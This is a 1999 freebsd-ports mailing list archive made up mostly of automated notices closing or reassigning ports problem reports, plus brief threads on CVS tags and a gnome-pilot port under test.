Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 557BE15674; Thu, 23 Dec 1999 10:35:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA04982; Thu, 23 Dec 1999 10:35:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:35:44 -0800 (PST) From: Message-Id: <199912231835.KAA04982@freefall.freebsd.org> To: vns@delta.odessa.ua, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15359: Update port: russian/apache13 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: russian/apache13 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:34:01 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:41:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 15037157A5; Thu, 23 Dec 1999 10:41:31 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA05897; Thu, 23 Dec 1999 10:41:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:41:30 -0800 (PST) From: Message-Id: <199912231841.KAA05897@freefall.freebsd.org> To: shuna@pop16.odn.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15366: Update: japanese/libslang Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update: japanese/libslang State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:38:38 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:44:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 36F56157D1; Thu, 23 Dec 1999 10:44:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA06277; Thu, 23 Dec 1999 10:44:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:44:22 -0800 (PST) From: Message-Id: <199912231844.KAA06277@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15378: Update port: audio/maplay Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: audio/maplay State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:41:59 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:46:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 70E7E1578C; Thu, 23 Dec 1999 10:46:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA06665; Thu, 23 Dec 1999 10:46:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:46:50 -0800 (PST) From: Message-Id: <199912231846.KAA06665@freefall.freebsd.org> To: taguchi@tohoku.iij.ad.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15393: [fix] japanese/expect Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [fix] japanese/expect State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:45:39 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:50:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A7DD21585D; Thu, 23 Dec 1999 10:50:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA07185; Thu, 23 Dec 1999 10:50:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:50:34 -0800 (PST) From: Message-Id: <199912231850.KAA07185@freefall.freebsd.org> To: james@ja.ath.cx, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15397: port lang/elk: CC not settable. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port lang/elk: CC not settable. State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:47:09 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:53:50 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B0564158D7; Thu, 23 Dec 1999 10:53:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA07538; Thu, 23 Dec 1999 10:53:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 10:53:41 -0800 (PST) From: Message-Id: <199912231853.KAA07538@freefall.freebsd.org> To: matt@zigg.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15409: [PATCH] net/tik shell script to launch ``tac'' CLI client Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] net/tik shell script to launch ``tac'' CLI client State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:51:56 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:56:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2E04A15410; Thu, 23 Dec 1999 10:56:28 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA07865; Thu, 23 Dec 1999 10:56:28 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Thu, 23 Dec 1999 10:56:28 -0800 (PST) From: Message-Id: <199912231856.KAA07865@freefall.freebsd.org> To: saper@system.pl, billf@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15652: Update graphics/gif2png to version 2.2.5 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update graphics/gif2png to version 2.2.5 State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Thu Dec 23 10:39:27 PST 1999 State-Changed-Why: Updated in ports/graphics/gif2png/Makefile:1.5, you might want to check out the uglyness of adding python. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 10:58:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 4B9BD156AD for ; Thu, 23 Dec 1999 10:58:56 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id BF92F1C2B; Thu, 23 Dec 1999 13:58:19 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id BB359381B; Thu, 23 Dec 1999 13:58:19 -0500 (EST) Date: Thu, 23 Dec 1999 13:58:19 -0500 (EST) From: Bill Fumerola To: Marcin Cieslak Cc: freebsd-ports@freebsd.org Subject: Re: CVS release tags on ports In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 23 Dec 1999, Marcin Cieslak wrote: > What are the rules on setting CVS release tags > in the ports tree? Besides being unique, none. You'll see different variations of 'billf', 'bfumerola', 'fumerola', and if you look at ports that vanilla imported, misspelling of the above. It's not really important in the ports tree. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:17:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 31C90156AE; Thu, 23 Dec 1999 11:17:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA09385; Thu, 23 Dec 1999 11:17:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:17:16 -0800 (PST) From: Message-Id: <199912231917.LAA09385@freefall.freebsd.org> To: okazaki@be.to, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15432: fix devel/t1lib packaging error Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: fix devel/t1lib packaging error State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 10:55:31 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:19:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E4EF615835; Thu, 23 Dec 1999 11:18:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA09677; Thu, 23 Dec 1999 11:18:47 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:18:47 -0800 (PST) From: Message-Id: <199912231918.LAA09677@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15467: Update port: graphics/tiff Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/tiff State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:17:28 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:23:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B3DDF14D26; Thu, 23 Dec 1999 11:23:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA10287; Thu, 23 Dec 1999 11:23:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:23:11 -0800 (PST) From: Message-Id: <199912231923.LAA10287@freefall.freebsd.org> To: lkoeller@cc.fh-lippe.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15479: Ports update of syncal to version 0.8.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Ports update of syncal to version 0.8.3 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:21:11 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:26:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 17DED15921; Thu, 23 Dec 1999 11:26:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA10646; Thu, 23 Dec 1999 11:26:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:26:11 -0800 (PST) From: Message-Id: <199912231926.LAA10646@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15499: Update port: math/eispack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/eispack State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:23:58 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:28:17 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E62915975; Thu, 23 Dec 1999 11:28:10 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA10981; Thu, 23 Dec 1999 11:28:10 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:28:10 -0800 (PST) From: Message-Id: <199912231928.LAA10981@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15500: Update port: math/linpack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/linpack State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:26:48 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:30:50 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D3AC615798; Thu, 23 Dec 1999 11:30:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA11340; Thu, 23 Dec 1999 11:30:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:30:39 -0800 (PST) From: Message-Id: <199912231930.LAA11340@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15501: Update port: math/superlu to 2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/superlu to 2.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:28:45 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:32:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C3759156FB; Thu, 23 Dec 1999 11:32:10 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA11540; Thu, 23 Dec 1999 11:32:10 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:32:10 -0800 (PST) From: Message-Id: <199912231932.LAA11540@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15502: Update port: math/umfpack to 2.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: math/umfpack to 2.2.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:31:03 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:33:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 91C65157C3; Thu, 23 Dec 1999 11:33:35 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA11739; Thu, 23 Dec 1999 11:33:35 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:33:35 -0800 (PST) From: Message-Id: <199912231933.LAA11739@freefall.freebsd.org> To: ade@lovett.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15506: Update x11-toolkits/gtk-engines Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update x11-toolkits/gtk-engines State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:32:47 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:46:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C19F815824; Thu, 23 Dec 1999 11:46:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA12680; Thu, 23 Dec 1999 11:46:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 11:46:38 -0800 (PST) From: Message-Id: <199912231946.LAA12680@freefall.freebsd.org> To: andy@icc.surw.chel.su, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/6181: New port: xoj-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: xoj-1.0 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 11:40:04 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 11:54:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2789515410; Thu, 23 Dec 1999 11:54:33 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA13383; Thu, 23 Dec 1999 11:54:33 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 11:54:33 -0800 (PST) From: Message-Id: <199912231954.LAA13383@freefall.freebsd.org> To: yoshiaki@kt.rim.or.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15524: ports audio dap-2.0.2 MD5 probrem Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ports audio dap-2.0.2 MD5 probrem State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 11:53:42 PST 1999 State-Changed-Why: steve fixed this yesterday, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 12: 4: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7357B14D4B; Thu, 23 Dec 1999 12:04:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA14332; Thu, 23 Dec 1999 12:04:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 12:04:06 -0800 (PST) From: Message-Id: <199912232004.MAA14332@freefall.freebsd.org> To: ust@cert.siemens.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15622: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 12:03:45 PST 1999 State-Changed-Why: Duplicate of ports/15623. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 12:35:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id B235614D9B for ; Thu, 23 Dec 1999 12:35:10 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.12 #1) id 121Ewt-000EqR-00; Thu, 23 Dec 1999 14:34:59 -0600 Date: Thu, 23 Dec 1999 14:34:59 -0600 From: Ade Lovett To: John and Jennifer Reynolds Cc: ports@freebsd.org Subject: Re: anyone working on gnome-pilot? Message-ID: <19991223143459.B42743@lovett.com> References: <14432.22932.78396.399799@whale.home-net> <19991222095341.A92612@lovett.com> <14432.63899.673504.550939@whale.home-net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14432.63899.673504.550939@whale.home-net>; from jjreynold@home.com on Wed, Dec 22, 1999 at 09:17:31AM -0700 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 22, 1999 at 09:17:31AM -0700, John and Jennifer Reynolds wrote: > > Eagerly looking forward to your updated port. I'll be a tester! http://www.lovett.com/FreeBSD/gnomepilot.shar seems to work, at least on 3.4-STABLE (with the usual caveats about the application itself not being complete). Let me know how it goes and I'll send-pr it in. -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 12:44:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BEF6A15759; Thu, 23 Dec 1999 12:44:05 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA17686; Thu, 23 Dec 1999 12:44:05 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 12:44:05 -0800 (PST) From: Message-Id: <199912232044.MAA17686@freefall.freebsd.org> To: domi@saargate.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12699: New port: gnofin-0.5.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: gnofin-0.5.10 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 12:41:26 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13: 5:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 356FE14DD7; Thu, 23 Dec 1999 13:05:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA19451; Thu, 23 Dec 1999 13:05:50 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:05:50 -0800 (PST) From: Message-Id: <199912232105.NAA19451@freefall.freebsd.org> To: folks@hplc1.com, steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: pending/15638: Port makefile for "mysqltutor" tutorial fails Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Port makefile for "mysqltutor" tutorial fails State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 13:05:02 PST 1999 State-Changed-Why: This port has been removed from the ports tree for this very reason. :) Responsible-Changed-From-To: gnats-admin->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 13:05:02 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13: 8:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DB5814D81; Thu, 23 Dec 1999 13:08:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA19684; Thu, 23 Dec 1999 13:08:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:08:29 -0800 (PST) From: Message-Id: <199912232108.NAA19684@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: pending/15653: Upgrade ports/chinese/bg5ps Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade ports/chinese/bg5ps Responsible-Changed-From-To: gnats-admin->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 13:07:57 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13: 8:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B744214E20; Thu, 23 Dec 1999 13:08:58 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA19784; Thu, 23 Dec 1999 13:08:58 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:08:58 -0800 (PST) From: Message-Id: <199912232108.NAA19784@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: pending/15654: Upgrade chinese/libtabe Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade chinese/libtabe Responsible-Changed-From-To: gnats-admin->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 13:08:36 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13: 9:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4471E14E41; Thu, 23 Dec 1999 13:09:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA19876; Thu, 23 Dec 1999 13:09:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:09:25 -0800 (PST) From: Message-Id: <199912232109.NAA19876@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: pending/15655: Upgrade chinese/xcin25 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade chinese/xcin25 Responsible-Changed-From-To: gnats-admin->freebsd-ports Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 13:09:07 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13:12:44 1999 Delivered-To: 